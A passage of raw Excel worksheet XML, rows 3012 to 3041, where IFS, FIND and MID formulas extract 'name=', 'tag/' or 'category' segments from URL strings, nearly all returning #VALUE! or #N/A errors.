    ISNUMBER(FIND("name=",$A3012)), MID($A3012, FIND("name=",$A3012) + 5, LEN($A3012) - FIND("name=",$A3012)),
    ISNUMBER(FIND("tag/",$A3012)), MID($A3012, FIND("tag/",$A3012) + 4, LEN($A3012) - FIND("tag/",$A3012)),
    ISNUMBER(FIND("category",$A3012)), MID($A3012, FIND("category",$A3012) + 9, LEN($A3012) - FIND("category",$A3012)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3012" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3013" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3013" t="s">
        <v>2264</v>
      </c>
      <c r="B3013" t="e">
        <f t="shared" si="139"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3013" t="e">
        <f t="shared" si="140"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3013" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3013" t="e" cm="1">
        <f t="array" ref="E3013">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3013)), MID($A3013, FIND("name=",$A3013) + 5, LEN($A3013) - FIND("name=",$A3013)),
    ISNUMBER(FIND("tag/",$A3013)), MID($A3013, FIND("tag/",$A3013) + 4, LEN($A3013) - FIND("tag/",$A3013)),
    ISNUMBER(FIND("category",$A3013)), MID($A3013, FIND("category",$A3013) + 9, LEN($A3013) - FIND("category",$A3013)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3013" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3014" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3014" t="s">
        <v>2601</v>
      </c>
      <c r="B3014" t="e">
        <f t="shared" ref="B3014:B3077" si="142">IF(FIND("name=",A3014,1)&gt;0,MID(A3014,FIND("name=",A3014,1)+5,LEN(A3014)-FIND("name=",A3014,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3014" t="e">
        <f t="shared" ref="C3014:C3077" si="143">IF(FIND("tag/",$A3014,1)&gt;0,MID($A3014,FIND("tag/",$A3014,1)+4,LEN($A3014)-FIND("tag/",$A3014,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3014" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3014" t="e" cm="1">
        <f t="array" ref="E3014">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3014)), MID($A3014, FIND("name=",$A3014) + 5, LEN($A3014) - FIND("name=",$A3014)),
    ISNUMBER(FIND("tag/",$A3014)), MID($A3014, FIND("tag/",$A3014) + 4, LEN($A3014) - FIND("tag/",$A3014)),
    ISNUMBER(FIND("category",$A3014)), MID($A3014, FIND("category",$A3014) + 9, LEN($A3014) - FIND("category",$A3014)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3014" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3015" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3015" t="s">
        <v>2248</v>
      </c>
      <c r="B3015" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3015" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3015" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3015" t="e" cm="1">
        <f t="array" ref="E3015">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3015)), MID($A3015, FIND("name=",$A3015) + 5, LEN($A3015) - FIND("name=",$A3015)),
    ISNUMBER(FIND("tag/",$A3015)), MID($A3015, FIND("tag/",$A3015) + 4, LEN($A3015) - FIND("tag/",$A3015)),
    ISNUMBER(FIND("category",$A3015)), MID($A3015, FIND("category",$A3015) + 9, LEN($A3015) - FIND("category",$A3015)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3015" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3016" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3016" t="s">
        <v>2260</v>
      </c>
      <c r="B3016" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3016" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3016" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3016" t="e" cm="1">
        <f t="array" ref="E3016">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3016)), MID($A3016, FIND("name=",$A3016) + 5, LEN($A3016) - FIND("name=",$A3016)),
    ISNUMBER(FIND("tag/",$A3016)), MID($A3016, FIND("tag/",$A3016) + 4, LEN($A3016) - FIND("tag/",$A3016)),
    ISNUMBER(FIND("category",$A3016)), MID($A3016, FIND("category",$A3016) + 9, LEN($A3016) - FIND("category",$A3016)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3016" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3017" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3017" t="s">
        <v>2260</v>
      </c>
      <c r="B3017" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3017" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3017" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3017" t="e" cm="1">
        <f t="array" ref="E3017">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3017)), MID($A3017, FIND("name=",$A3017) + 5, LEN($A3017) - FIND("name=",$A3017)),
    ISNUMBER(FIND("tag/",$A3017)), MID($A3017, FIND("tag/",$A3017) + 4, LEN($A3017) - FIND("tag/",$A3017)),
    ISNUMBER(FIND("category",$A3017)), MID($A3017, FIND("category",$A3017) + 9, LEN($A3017) - FIND("category",$A3017)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3017" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3018" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3018" t="s">
        <v>2248</v>
      </c>
      <c r="B3018" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3018" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3018" t="e">
        <f t="shared" si="141"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3018" t="e" cm="1">
        <f t="array" ref="E3018">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3018)), MID($A3018, FIND("name=",$A3018) + 5, LEN($A3018) - FIND("name=",$A3018)),
    ISNUMBER(FIND("tag/",$A3018)), MID($A3018, FIND("tag/",$A3018) + 4, LEN($A3018) - FIND("tag/",$A3018)),
    ISNUMBER(FIND("category",$A3018)), MID($A3018, FIND("category",$A3018) + 9, LEN($A3018) - FIND("category",$A3018)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3018" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3019" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3019" t="s">
        <v>2370</v>
      </c>
      <c r="B3019" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3019" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3019" t="e">
        <f t="shared" ref="D3019:D3082" si="144">IF(FIND("category",$A3019,1)&gt;0,MID($A3019,FIND("category",$A3019,1)+9,LEN($A3019)-FIND("category",$A3019,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3019" t="e" cm="1">
        <f t="array" ref="E3019">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3019)), MID($A3019, FIND("name=",$A3019) + 5, LEN($A3019) - FIND("name=",$A3019)),
    ISNUMBER(FIND("tag/",$A3019)), MID($A3019, FIND("tag/",$A3019) + 4, LEN($A3019) - FIND("tag/",$A3019)),
    ISNUMBER(FIND("category",$A3019)), MID($A3019, FIND("category",$A3019) + 9, LEN($A3019) - FIND("category",$A3019)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3019" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3020" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3020" t="s">
        <v>2371</v>
      </c>
      <c r="B3020" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3020" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3020" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3020" t="e" cm="1">
        <f t="array" ref="E3020">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3020)), MID($A3020, FIND("name=",$A3020) + 5, LEN($A3020) - FIND("name=",$A3020)),
    ISNUMBER(FIND("tag/",$A3020)), MID($A3020, FIND("tag/",$A3020) + 4, LEN($A3020) - FIND("tag/",$A3020)),
    ISNUMBER(FIND("category",$A3020)), MID($A3020, FIND("category",$A3020) + 9, LEN($A3020) - FIND("category",$A3020)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3020" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3021" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3021" t="s">
        <v>2413</v>
      </c>
      <c r="B3021" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3021" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3021" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3021" t="e" cm="1">
        <f t="array" ref="E3021">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3021)), MID($A3021, FIND("name=",$A3021) + 5, LEN($A3021) - FIND("name=",$A3021)),
    ISNUMBER(FIND("tag/",$A3021)), MID($A3021, FIND("tag/",$A3021) + 4, LEN($A3021) - FIND("tag/",$A3021)),
    ISNUMBER(FIND("category",$A3021)), MID($A3021, FIND("category",$A3021) + 9, LEN($A3021) - FIND("category",$A3021)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3021" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3022" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3022" t="s">
        <v>2248</v>
      </c>
      <c r="B3022" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3022" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3022" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3022" t="e" cm="1">
        <f t="array" ref="E3022">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3022)), MID($A3022, FIND("name=",$A3022) + 5, LEN($A3022) - FIND("name=",$A3022)),
    ISNUMBER(FIND("tag/",$A3022)), MID($A3022, FIND("tag/",$A3022) + 4, LEN($A3022) - FIND("tag/",$A3022)),
    ISNUMBER(FIND("category",$A3022)), MID($A3022, FIND("category",$A3022) + 9, LEN($A3022) - FIND("category",$A3022)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3022" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3023" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3023" t="s">
        <v>2248</v>
      </c>
      <c r="B3023" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3023" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3023" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3023" t="e" cm="1">
        <f t="array" ref="E3023">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3023)), MID($A3023, FIND("name=",$A3023) + 5, LEN($A3023) - FIND("name=",$A3023)),
    ISNUMBER(FIND("tag/",$A3023)), MID($A3023, FIND("tag/",$A3023) + 4, LEN($A3023) - FIND("tag/",$A3023)),
    ISNUMBER(FIND("category",$A3023)), MID($A3023, FIND("category",$A3023) + 9, LEN($A3023) - FIND("category",$A3023)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3023" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3024" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3024" t="s">
        <v>2248</v>
      </c>
      <c r="B3024" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3024" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3024" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3024" t="e" cm="1">
        <f t="array" ref="E3024">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3024)), MID($A3024, FIND("name=",$A3024) + 5, LEN($A3024) - FIND("name=",$A3024)),
    ISNUMBER(FIND("tag/",$A3024)), MID($A3024, FIND("tag/",$A3024) + 4, LEN($A3024) - FIND("tag/",$A3024)),
    ISNUMBER(FIND("category",$A3024)), MID($A3024, FIND("category",$A3024) + 9, LEN($A3024) - FIND("category",$A3024)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3024" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3025" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3025" t="s">
        <v>2248</v>
      </c>
      <c r="B3025" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3025" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3025" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3025" t="e" cm="1">
        <f t="array" ref="E3025">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3025)), MID($A3025, FIND("name=",$A3025) + 5, LEN($A3025) - FIND("name=",$A3025)),
    ISNUMBER(FIND("tag/",$A3025)), MID($A3025, FIND("tag/",$A3025) + 4, LEN($A3025) - FIND("tag/",$A3025)),
    ISNUMBER(FIND("category",$A3025)), MID($A3025, FIND("category",$A3025) + 9, LEN($A3025) - FIND("category",$A3025)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3025" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3026" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3026" t="s">
        <v>2248</v>
      </c>
      <c r="B3026" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3026" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3026" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3026" t="e" cm="1">
        <f t="array" ref="E3026">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3026)), MID($A3026, FIND("name=",$A3026) + 5, LEN($A3026) - FIND("name=",$A3026)),
    ISNUMBER(FIND("tag/",$A3026)), MID($A3026, FIND("tag/",$A3026) + 4, LEN($A3026) - FIND("tag/",$A3026)),
    ISNUMBER(FIND("category",$A3026)), MID($A3026, FIND("category",$A3026) + 9, LEN($A3026) - FIND("category",$A3026)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3026" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3027" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3027" t="s">
        <v>2248</v>
      </c>
      <c r="B3027" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3027" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3027" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3027" t="e" cm="1">
        <f t="array" ref="E3027">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3027)), MID($A3027, FIND("name=",$A3027) + 5, LEN($A3027) - FIND("name=",$A3027)),
    ISNUMBER(FIND("tag/",$A3027)), MID($A3027, FIND("tag/",$A3027) + 4, LEN($A3027) - FIND("tag/",$A3027)),
    ISNUMBER(FIND("category",$A3027)), MID($A3027, FIND("category",$A3027) + 9, LEN($A3027) - FIND("category",$A3027)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3027" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3028" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3028" t="s">
        <v>2248</v>
      </c>
      <c r="B3028" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3028" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3028" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3028" t="e" cm="1">
        <f t="array" ref="E3028">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3028)), MID($A3028, FIND("name=",$A3028) + 5, LEN($A3028) - FIND("name=",$A3028)),
    ISNUMBER(FIND("tag/",$A3028)), MID($A3028, FIND("tag/",$A3028) + 4, LEN($A3028) - FIND("tag/",$A3028)),
    ISNUMBER(FIND("category",$A3028)), MID($A3028, FIND("category",$A3028) + 9, LEN($A3028) - FIND("category",$A3028)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3028" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3029" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3029" t="s">
        <v>2821</v>
      </c>
      <c r="B3029" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3029" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3029" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3029" t="e" cm="1">
        <f t="array" ref="E3029">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3029)), MID($A3029, FIND("name=",$A3029) + 5, LEN($A3029) - FIND("name=",$A3029)),
    ISNUMBER(FIND("tag/",$A3029)), MID($A3029, FIND("tag/",$A3029) + 4, LEN($A3029) - FIND("tag/",$A3029)),
    ISNUMBER(FIND("category",$A3029)), MID($A3029, FIND("category",$A3029) + 9, LEN($A3029) - FIND("category",$A3029)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3029" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3030" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3030" t="s">
        <v>2821</v>
      </c>
      <c r="B3030" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3030" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3030" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3030" t="e" cm="1">
        <f t="array" ref="E3030">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3030)), MID($A3030, FIND("name=",$A3030) + 5, LEN($A3030) - FIND("name=",$A3030)),
    ISNUMBER(FIND("tag/",$A3030)), MID($A3030, FIND("tag/",$A3030) + 4, LEN($A3030) - FIND("tag/",$A3030)),
    ISNUMBER(FIND("category",$A3030)), MID($A3030, FIND("category",$A3030) + 9, LEN($A3030) - FIND("category",$A3030)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3030" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3031" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3031" t="s">
        <v>2619</v>
      </c>
      <c r="B3031" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3031" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3031" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3031" t="e" cm="1">
        <f t="array" ref="E3031">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3031)), MID($A3031, FIND("name=",$A3031) + 5, LEN($A3031) - FIND("name=",$A3031)),
    ISNUMBER(FIND("tag/",$A3031)), MID($A3031, FIND("tag/",$A3031) + 4, LEN($A3031) - FIND("tag/",$A3031)),
    ISNUMBER(FIND("category",$A3031)), MID($A3031, FIND("category",$A3031) + 9, LEN($A3031) - FIND("category",$A3031)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3031" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3032" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3032" t="s">
        <v>2604</v>
      </c>
      <c r="B3032" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3032" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3032" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3032" t="e" cm="1">
        <f t="array" ref="E3032">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3032)), MID($A3032, FIND("name=",$A3032) + 5, LEN($A3032) - FIND("name=",$A3032)),
    ISNUMBER(FIND("tag/",$A3032)), MID($A3032, FIND("tag/",$A3032) + 4, LEN($A3032) - FIND("tag/",$A3032)),
    ISNUMBER(FIND("category",$A3032)), MID($A3032, FIND("category",$A3032) + 9, LEN($A3032) - FIND("category",$A3032)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3032" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3033" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3033" t="s">
        <v>2410</v>
      </c>
      <c r="B3033" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3033" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3033" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3033" t="e" cm="1">
        <f t="array" ref="E3033">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3033)), MID($A3033, FIND("name=",$A3033) + 5, LEN($A3033) - FIND("name=",$A3033)),
    ISNUMBER(FIND("tag/",$A3033)), MID($A3033, FIND("tag/",$A3033) + 4, LEN($A3033) - FIND("tag/",$A3033)),
    ISNUMBER(FIND("category",$A3033)), MID($A3033, FIND("category",$A3033) + 9, LEN($A3033) - FIND("category",$A3033)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3033" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3034" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3034" t="s">
        <v>2606</v>
      </c>
      <c r="B3034" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3034" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3034" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3034" t="e" cm="1">
        <f t="array" ref="E3034">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3034)), MID($A3034, FIND("name=",$A3034) + 5, LEN($A3034) - FIND("name=",$A3034)),
    ISNUMBER(FIND("tag/",$A3034)), MID($A3034, FIND("tag/",$A3034) + 4, LEN($A3034) - FIND("tag/",$A3034)),
    ISNUMBER(FIND("category",$A3034)), MID($A3034, FIND("category",$A3034) + 9, LEN($A3034) - FIND("category",$A3034)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3034" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3035" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3035" t="s">
        <v>2605</v>
      </c>
      <c r="B3035" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3035" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3035" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3035" t="e" cm="1">
        <f t="array" ref="E3035">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3035)), MID($A3035, FIND("name=",$A3035) + 5, LEN($A3035) - FIND("name=",$A3035)),
    ISNUMBER(FIND("tag/",$A3035)), MID($A3035, FIND("tag/",$A3035) + 4, LEN($A3035) - FIND("tag/",$A3035)),
    ISNUMBER(FIND("category",$A3035)), MID($A3035, FIND("category",$A3035) + 9, LEN($A3035) - FIND("category",$A3035)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3035" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3036" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3036" t="s">
        <v>2607</v>
      </c>
      <c r="B3036" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3036" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3036" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3036" t="e" cm="1">
        <f t="array" ref="E3036">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3036)), MID($A3036, FIND("name=",$A3036) + 5, LEN($A3036) - FIND("name=",$A3036)),
    ISNUMBER(FIND("tag/",$A3036)), MID($A3036, FIND("tag/",$A3036) + 4, LEN($A3036) - FIND("tag/",$A3036)),
    ISNUMBER(FIND("category",$A3036)), MID($A3036, FIND("category",$A3036) + 9, LEN($A3036) - FIND("category",$A3036)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3036" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3037" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3037" t="s">
        <v>2512</v>
      </c>
      <c r="B3037" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3037" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3037" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3037" t="e" cm="1">
        <f t="array" ref="E3037">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3037)), MID($A3037, FIND("name=",$A3037) + 5, LEN($A3037) - FIND("name=",$A3037)),
    ISNUMBER(FIND("tag/",$A3037)), MID($A3037, FIND("tag/",$A3037) + 4, LEN($A3037) - FIND("tag/",$A3037)),
    ISNUMBER(FIND("category",$A3037)), MID($A3037, FIND("category",$A3037) + 9, LEN($A3037) - FIND("category",$A3037)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3037" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3038" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3038" t="s">
        <v>2608</v>
      </c>
      <c r="B3038" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3038" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3038" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3038" t="e" cm="1">
        <f t="array" ref="E3038">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3038)), MID($A3038, FIND("name=",$A3038) + 5, LEN($A3038) - FIND("name=",$A3038)),
    ISNUMBER(FIND("tag/",$A3038)), MID($A3038, FIND("tag/",$A3038) + 4, LEN($A3038) - FIND("tag/",$A3038)),
    ISNUMBER(FIND("category",$A3038)), MID($A3038, FIND("category",$A3038) + 9, LEN($A3038) - FIND("category",$A3038)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3038" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3039" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3039" t="s">
        <v>2610</v>
      </c>
      <c r="B3039" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3039" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3039" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3039" t="e" cm="1">
        <f t="array" ref="E3039">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3039)), MID($A3039, FIND("name=",$A3039) + 5, LEN($A3039) - FIND("name=",$A3039)),
    ISNUMBER(FIND("tag/",$A3039)), MID($A3039, FIND("tag/",$A3039) + 4, LEN($A3039) - FIND("tag/",$A3039)),
    ISNUMBER(FIND("category",$A3039)), MID($A3039, FIND("category",$A3039) + 9, LEN($A3039) - FIND("category",$A3039)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3039" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3040" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3040" t="s">
        <v>2609</v>
      </c>
      <c r="B3040" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3040" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3040" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3040" t="e" cm="1">
        <f t="array" ref="E3040">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3040)), MID($A3040, FIND("name=",$A3040) + 5, LEN($A3040) - FIND("name=",$A3040)),
    ISNUMBER(FIND("tag/",$A3040)), MID($A3040, FIND("tag/",$A3040) + 4, LEN($A3040) - FIND("tag/",$A3040)),
    ISNUMBER(FIND("category",$A3040)), MID($A3040, FIND("category",$A3040) + 9, LEN($A3040) - FIND("category",$A3040)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3040" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3041" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3041" t="s">
        <v>2611</v>
      </c>
      <c r="B3041" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3041" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3041" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3041" t="e" cm="1">
        <f t="array" ref="E3041">_xlfn.IFS(
